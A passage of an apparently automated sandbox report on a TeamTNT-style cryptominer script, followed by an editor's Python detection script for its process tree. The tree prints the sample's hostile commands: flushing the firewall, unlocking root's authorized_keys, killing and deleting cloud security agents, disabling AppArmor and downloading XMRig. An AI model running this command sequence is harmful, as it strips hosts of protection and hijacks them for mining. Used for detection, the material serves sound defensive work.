        • ufw-init New Fork (PID: 7208, Parent: 7083)
        • ip6tables (PID: 7208, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7209, Parent: 7083)
        • ip6tables (PID: 7209, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit
        • ufw-init New Fork (PID: 7210, Parent: 7083)
        • ip6tables (PID: 7210, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7211, Parent: 7083)
        • ip6tables (PID: 7211, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-input
        • ufw-init New Fork (PID: 7212, Parent: 7083)
        • ip6tables (PID: 7212, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-input
        • ufw-init New Fork (PID: 7213, Parent: 7083)
        • ip6tables (PID: 7213, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-input
        • ufw-init New Fork (PID: 7214, Parent: 7083)
        • ip6tables (PID: 7214, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-input
        • ufw-init New Fork (PID: 7215, Parent: 7083)
        • ip6tables (PID: 7215, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-input
        • ufw-init New Fork (PID: 7216, Parent: 7083)
        • ip6tables (PID: 7216, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-input
        • ufw-init New Fork (PID: 7217, Parent: 7083)
        • ip6tables (PID: 7217, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7218, Parent: 7083)
        • ip6tables (PID: 7218, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-forward
        • ufw-init New Fork (PID: 7219, Parent: 7083)
        • ip6tables (PID: 7219, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-forward
        • ufw-init New Fork (PID: 7220, Parent: 7083)
        • ip6tables (PID: 7220, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-forward
        • ufw-init New Fork (PID: 7221, Parent: 7083)
        • ip6tables (PID: 7221, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7222, Parent: 7083)
        • ip6tables (PID: 7222, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-forward
        • ufw-init New Fork (PID: 7223, Parent: 7083)
        • ip6tables (PID: 7223, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-forward
        • ufw-init New Fork (PID: 7224, Parent: 7083)
        • ip6tables (PID: 7224, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-forward
        • ufw-init New Fork (PID: 7225, Parent: 7083)
        • ip6tables (PID: 7225, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-forward
        • ufw-init New Fork (PID: 7226, Parent: 7083)
        • ip6tables (PID: 7226, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-output
        • ufw-init New Fork (PID: 7227, Parent: 7083)
        • ip6tables (PID: 7227, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-input
        • ufw-init New Fork (PID: 7228, Parent: 7083)
        • ip6tables (PID: 7228, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7229, Parent: 7083)
        • ip6tables (PID: 7229, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-output
        • ufw-init New Fork (PID: 7230, Parent: 7083)
        • ip6tables (PID: 7230, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-output
        • ufw-init New Fork (PID: 7231, Parent: 7083)
        • ip6tables (PID: 7231, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-output
        • ufw-init New Fork (PID: 7232, Parent: 7083)
        • ip6tables (PID: 7232, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-output
        • ufw-init New Fork (PID: 7233, Parent: 7083)
        • ip6tables (PID: 7233, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-output
        • ufw-init New Fork (PID: 7234, Parent: 7083)
        • ip6tables (PID: 7234, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-output
        • ufw-init New Fork (PID: 7235, Parent: 7083)
        • ip6tables (PID: 7235, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-output
        • ufw-init New Fork (PID: 7236, Parent: 7083)
        • ip6tables (PID: 7236, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-deny
        • ufw-init New Fork (PID: 7237, Parent: 7083)
        • ip6tables (PID: 7237, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-allow
        • ufw-init New Fork (PID: 7238, Parent: 7083)
        • ip6tables (PID: 7238, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-not-local
        • ufw-init New Fork (PID: 7239, Parent: 7083)
        • ip6tables (PID: 7239, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-input
        • ufw-init New Fork (PID: 7240, Parent: 7083)
        • ip6tables (PID: 7240, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-output
        • ufw-init New Fork (PID: 7241, Parent: 7083)
        • ip6tables (PID: 7241, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7242, Parent: 7083)
        • ip6tables (PID: 7242, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7243, Parent: 7083)
        • ip6tables (PID: 7243, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit
        • ufw-init New Fork (PID: 7244, Parent: 7083)
        • ip6tables (PID: 7244, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-input
        • ufw-init New Fork (PID: 7245, Parent: 7083)
        • ip6tables (PID: 7245, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-forward
        • ufw-init New Fork (PID: 7246, Parent: 7083)
        • ip6tables (PID: 7246, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-output
        • ufw-init New Fork (PID: 7247, Parent: 7083)
        • ip6tables (PID: 7247, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7248, Parent: 7083)
        • ip6tables (PID: 7248, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7249, Parent: 7083)
        • ip6tables (PID: 7249, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7250, Parent: 7083)
        • ip6tables (PID: 7250, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 7251, Parent: 7083)
        • ip6tables (PID: 7251, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 7252, Parent: 7083)
        • ip6tables (PID: 7252, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P FORWARD ACCEPT
    • bash New Fork (PID: 7253, Parent: 7068)
    • iptables (PID: 7253, Parent: 7068, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • bash New Fork (PID: 7254, Parent: 7068)
    • sudo (PID: 7254, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo sysctl kernel.nmi_watchdog=0
      • sudo New Fork (PID: 7255, Parent: 7254)
      • sysctl (PID: 7255, Parent: 7254, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl kernel.nmi_watchdog=0
    • bash New Fork (PID: 7256, Parent: 7068)
    • sysctl (PID: 7256, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl kernel.nmi_watchdog=0
    • bash New Fork (PID: 7257, Parent: 7068)
    • chattr (PID: 7257, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iae /root/.ssh/
    • bash New Fork (PID: 7258, Parent: 7068)
    • chattr (PID: 7258, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iae /root/.ssh/authorized_keys
    • bash New Fork (PID: 7259, Parent: 7068)
    • rm (PID: 7259, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/addres*
    • bash New Fork (PID: 7260, Parent: 7068)
    • rm (PID: 7260, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/walle*
    • bash New Fork (PID: 7261, Parent: 7068)
    • rm (PID: 7261, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/keys
    • bash New Fork (PID: 7262, Parent: 7068)
    • ps (PID: 7262, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7263, Parent: 7068)
    • grep (PID: 7263, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -i [a]liyun
    • bash New Fork (PID: 7264, Parent: 7068)
    • ps (PID: 7264, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7265, Parent: 7068)
    • grep (PID: 7265, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -i [y]unjing
    • bash New Fork (PID: 7266, Parent: 7068)
    • bash New Fork (PID: 7267, Parent: 7068)
    • service (PID: 7267, Parent: 7068, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service apparmor stop
      • service New Fork (PID: 7268, Parent: 7267)
      • basename (PID: 7268, Parent: 7267, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7269, Parent: 7267)
      • basename (PID: 7269, Parent: 7267, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7270, Parent: 7267)
      • systemctl (PID: 7270, Parent: 7267, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 7271, Parent: 7267)
        • service New Fork (PID: 7272, Parent: 7271)
        • systemctl (PID: 7272, Parent: 7271, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 7273, Parent: 7271)
        • sed (PID: 7273, Parent: 7271, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 7267, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop apparmor.service
    • bash New Fork (PID: 7290, Parent: 7068)
    • systemctl (PID: 7290, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl disable apparmor
      • systemd-sysv-install (PID: 7291, Parent: 7290, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/systemd/systemd-sysv-install disable apparmor
        • getopt (PID: 7292, Parent: 7291, MD5: 1a12f43596437b1bf346d52618b3b1b7) Arguments: getopt -o r: --long root: -- disable apparmor
        • update-rc.d (PID: 7293, Parent: 7291, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor defaults
          • systemctl (PID: 7294, Parent: 7293, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl daemon-reload
        • update-rc.d (PID: 7298, Parent: 7291, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor disable
          • systemctl (PID: 7299, Parent: 7298, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl daemon-reload
    • bash New Fork (PID: 7306, Parent: 7068)
    • service (PID: 7306, Parent: 7068, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service aliyun.service stop
      • service New Fork (PID: 7307, Parent: 7306)
      • basename (PID: 7307, Parent: 7306, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7308, Parent: 7306)
      • basename (PID: 7308, Parent: 7306, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7309, Parent: 7306)
      • systemctl (PID: 7309, Parent: 7306, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 7310, Parent: 7306)
        • service New Fork (PID: 7311, Parent: 7310)
        • systemctl (PID: 7311, Parent: 7310, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 7312, Parent: 7310)
        • sed (PID: 7312, Parent: 7310, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 7306, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop aliyun.service.service
    • bash New Fork (PID: 7314, Parent: 7068)
    • systemctl (PID: 7314, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl disable aliyun.service
    • bash New Fork (PID: 7315, Parent: 7068)
    • ps (PID: 7315, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7316, Parent: 7068)
    • grep (PID: 7316, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v grep
    • bash New Fork (PID: 7317, Parent: 7068)
    • grep (PID: 7317, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep aegis
    • bash New Fork (PID: 7318, Parent: 7068)
    • awk (PID: 7318, Parent: 7068, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"
    • bash New Fork (PID: 7319, Parent: 7068)
    • xargs (PID: 7319, Parent: 7068, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I % kill -9 %
    • bash New Fork (PID: 7320, Parent: 7068)
    • ps (PID: 7320, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7321, Parent: 7068)
    • grep (PID: 7321, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v grep
    • bash New Fork (PID: 7322, Parent: 7068)
    • grep (PID: 7322, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep Yun
    • bash New Fork (PID: 7323, Parent: 7068)
    • awk (PID: 7323, Parent: 7068, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"
    • bash New Fork (PID: 7324, Parent: 7068)
    • xargs (PID: 7324, Parent: 7068, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I % kill -9 %
    • bash New Fork (PID: 7327, Parent: 7068)
    • rm (PID: 7327, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /usr/local/aegis
    • bash New Fork (PID: 7328, Parent: 7068)
    • id (PID: 7328, Parent: 7068, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u
    • bash New Fork (PID: 7329, Parent: 7068)
    • nproc (PID: 7329, Parent: 7068, MD5: 04dd2a7de93f86cdd6a12c0c30da1621) Arguments: nproc
    • bash New Fork (PID: 7330, Parent: 7068)
    • sysctl (PID: 7330, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl -w vm.nr_hugepages=1
    • bash New Fork (PID: 7331, Parent: 7068)
    • find (PID: 7331, Parent: 7068, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /sys/devices/system/node/node0 -maxdepth 0 -type d
    • bash New Fork (PID: 7333, Parent: 7068)
      • bash New Fork (PID: 7334, Parent: 7333)
      • bash New Fork (PID: 7335, Parent: 7333)
      • cut (PID: 7335, Parent: 7333, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -f1 -d.
    • bash New Fork (PID: 7336, Parent: 7068)
    • sudo (PID: 7336, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true
      • sudo New Fork (PID: 7337, Parent: 7336)
      • true (PID: 7337, Parent: 7336, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true
    • bash New Fork (PID: 7338, Parent: 7068)
    • sudo (PID: 7338, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true
      • sudo New Fork (PID: 7339, Parent: 7338)
      • true (PID: 7339, Parent: 7338, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true
    • bash New Fork (PID: 7340, Parent: 7068)
    • sudo (PID: 7340, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo systemctl stop xmrig.service
      • sudo New Fork (PID: 7341, Parent: 7340)
      • systemctl (PID: 7341, Parent: 7340, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop xmrig.service
    • bash New Fork (PID: 7342, Parent: 7068)
    • killall (PID: 7342, Parent: 7068, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 xmrig
    • bash New Fork (PID: 7343, Parent: 7068)
    • curl (PID: 7343, Parent: 7068, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -L --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-static-x64.tar.gz -o /tmp/xmrig.tar.gz
  • systemd New Fork (PID: 7274, Parent: 1)
  • true (PID: 7274, Parent: 1, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: /bin/true
  • systemd New Fork (PID: 7296, Parent: 7295)
  • snapd-env-generator (PID: 7296, Parent: 7295, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7301, Parent: 7300)
  • snapd-env-generator (PID: 7301, Parent: 7300, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7304, Parent: 7303)
  • snapd-env-generator (PID: 7304, Parent: 7303, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7379, Parent: 1)
  • whoopsie (PID: 7379, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • dpkg (PID: 7381, Parent: 7378, MD5: 5e18156b434fc45062eec2f28b9147be) Arguments: dpkg --print-architecture
  • cleanup
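Read from PID 7253 downward, the tree is a compact record of the script's defense-evasion and miner-staging steps: it flushes iptables, sets kernel.nmi_watchdog=0, clears the immutable attribute on /root/.ssh and authorized_keys, hunts for cloud host-security agents (aliyun, aegis, Yun, yunjing) with a ps | grep | awk | xargs kill -9 pipeline, stops and disables AppArmor and the aliyun service, removes /usr/local/aegis, reserves hugepages, stops any existing xmrig, and finally fetches a static XMRig release tarball. The block below is an added detection example written for this page; it is not code from the Joe Sandbox report or from the analysed script. It parses lines in the report's own process-tree format and maps each argument string to a behaviour rule. The rule names, the regular expressions and the benign `ls` line at the end of the sample are the editor's assumptions; the other sample lines are copied from the tree above.

```python
"""Map a sandbox process tree to TeamTNT-style behaviour rules.

Added example for this page, not code from the Joe Sandbox report or from
the analysed script. Rule names and patterns are the editor's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One tree entry, e.g.
#   • iptables (PID: 7253, Parent: 7068, MD5: 1ab05fef...) Arguments: iptables -F
# Fork entries ("bash New Fork (PID: 7253, Parent: 7068)") carry no MD5/arguments.
LINE_RE = re.compile(
    r"^\s*•\s*(?P<name>\S+)(?:\s+New Fork)?\s*"
    r"\(PID:\s*(?P<pid>\d+),\s*Parent:\s*(?P<ppid>\d+)"
    r"(?:,\s*MD5:\s*(?P<md5>[0-9a-f]{32}))?\)"
    r"(?:\s*Arguments:\s*(?P<args>.*?))?\s*$"
)


@dataclass
class Proc:
    name: str
    pid: int
    ppid: int
    md5: Optional[str]
    args: str  # empty for fork-only entries


# Behaviour rules, matched against the argument string with a leading
# "sudo " stripped. Each corresponds to a step visible in the tree.
RULES: list[tuple[str, re.Pattern[str]]] = [
    (rule_id, re.compile(rx))
    for rule_id, rx in [
        # iptables -F / ip6tables -P INPUT ACCEPT: firewall flushed or opened
        ("firewall_disabled", r"^ip6?tables\s+(?:-F\b|-P\s+(?:INPUT|OUTPUT|FORWARD)\s+ACCEPT)"),
        # sysctl kernel.nmi_watchdog=0: a common miner "performance" tweak
        ("nmi_watchdog_off", r"^sysctl\b.*\bkernel\.nmi_watchdog=0\b"),
        # sysctl -w vm.nr_hugepages=N: hugepages for the miner
        ("hugepages_tuning", r"^sysctl\s+-w\s+vm\.nr_hugepages=\d+"),
        # chattr -i on /root/.ssh: prepare authorized_keys for tampering
        ("ssh_immutable_cleared", r"^chattr\s+-\S*i\S*\s+/root/\.ssh"),
        # grep for cloud host-security agents in ps output
        ("cloud_agent_hunt", r"^grep\b.*(?:liyun|unjing|aegis|\bYun\b)"),
        # service/systemctl stop or disable of AppArmor or the aliyun service
        ("security_service_tamper",
         r"^(?:service|systemctl)\b(?=.*\b(?:stop|disable)\b)(?=.*\b(?:apparmor|aliyun)\b)"),
        # rm -rf of the cloud agent directory
        ("cloud_agent_removed", r"^rm\s+-rf\s+/usr/local/aegis\b"),
        # xargs -I % kill -9 %: tail of the ps|grep|awk|xargs kill pipeline
        ("mass_kill_pipeline", r"^xargs\b.*\bkill\s+-9\b"),
        # stop/kill an existing xmrig before (re)deploying one
        ("miner_restage", r"^(?:killall\s+-9\s+xmrig\b|systemctl\s+stop\s+xmrig\.service)"),
        # curl/wget of an xmrig release tarball
        ("miner_download", r"^(?:curl|wget)\b.*xmrig.*\.tar\.gz"),
    ]
]


def parse_tree(text: str) -> list[Proc]:
    """Parse every recognisable process-tree line; other lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs.append(Proc(m["name"], int(m["pid"]), int(m["ppid"]), m["md5"], m["args"] or ""))
    return procs


def scan(procs: list[Proc]) -> list[tuple[str, int, str]]:
    """Return (rule_id, pid, args) for every rule a process triggers."""
    hits = []
    for p in procs:
        args = re.sub(r"^sudo\s+", "", p.args)
        if not args:
            continue
        for rule_id, rx in RULES:
            if rx.search(args):
                hits.append((rule_id, p.pid, p.args))
    return hits


def summarize(text: str) -> dict[str, list[int]]:
    """Group triggering PIDs by rule, in tree order."""
    out: dict[str, list[int]] = {}
    for rule_id, pid, _ in scan(parse_tree(text)):
        out.setdefault(rule_id, []).append(pid)
    return out


# Constructed sample: lines copied from the report's tree plus one benign
# "ls" entry (made up, placeholder MD5) to show a non-match.
SAMPLE_TREE = """\
    • bash New Fork (PID: 7253, Parent: 7068)
    • iptables (PID: 7253, Parent: 7068, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • sysctl (PID: 7256, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl kernel.nmi_watchdog=0
    • chattr (PID: 7258, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iae /root/.ssh/authorized_keys
    • grep (PID: 7263, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -i [a]liyun
    • systemctl (PID: 7290, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl disable apparmor
    • xargs (PID: 7319, Parent: 7068, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I % kill -9 %
    • rm (PID: 7327, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /usr/local/aegis
    • sysctl (PID: 7330, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl -w vm.nr_hugepages=1
    • killall (PID: 7342, Parent: 7068, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 xmrig
    • curl (PID: 7343, Parent: 7068, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -L --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-static-x64.tar.gz -o /tmp/xmrig.tar.gz
    • ls (PID: 7400, Parent: 7068, MD5: 00000000000000000000000000000000) Arguments: ls -la /tmp
"""

if __name__ == "__main__":
    for rule_id, pids in summarize(SAMPLE_TREE).items():
        print(f"{rule_id:24s} PIDs {pids}")
```

Two caveats when turning this into a production rule. The `-Z`, `-X` and `-P ... ACCEPT` calls under ufw-init (PID 7083) are what ufw's own teardown looks like, so `firewall_disabled` should be correlated with the parent (here a bash running the sample) rather than alerted on alone. And the `ps` reads of /sys/devices/system/cpu/online listed under "Bitcoin Miner" further down are ordinary `ps` behaviour; the strong signals in this tree are the chattr on authorized_keys, the agent-kill pipeline and the xmrig fetch.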
Source | Rule | Description | Author | Strings
java8.sh | JoeSecurity_TeamTNT_4 | Yara detected TeamTNT | Joe Security |
    No Snort rule has matched

    Bitcoin Miner

    Source: Yara match | File source: java8.sh, type: SAMPLE
    Source: java8.sh | String found in binary or memory: echo "[*] Looking for the latest version of Xmrig miner"
    Source: bash "/tmp/java8.sh" | Stdout: monero
    Source: bash "/tmp/java8.sh" | Stdout: xmrig
    Source: bash "/tmp/java8.sh" | Stderr: xmrig
    Source: /usr/bin/ps (PID: 7262) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/ps (PID: 7264) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/ps (PID: 7315) | Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/ps (PID: 7320) | Reads CPU info from /sys: /sys/devices/system/cpu/online

    Spreading

    Source: java8.sh | String: #check curl, wget

    Networking
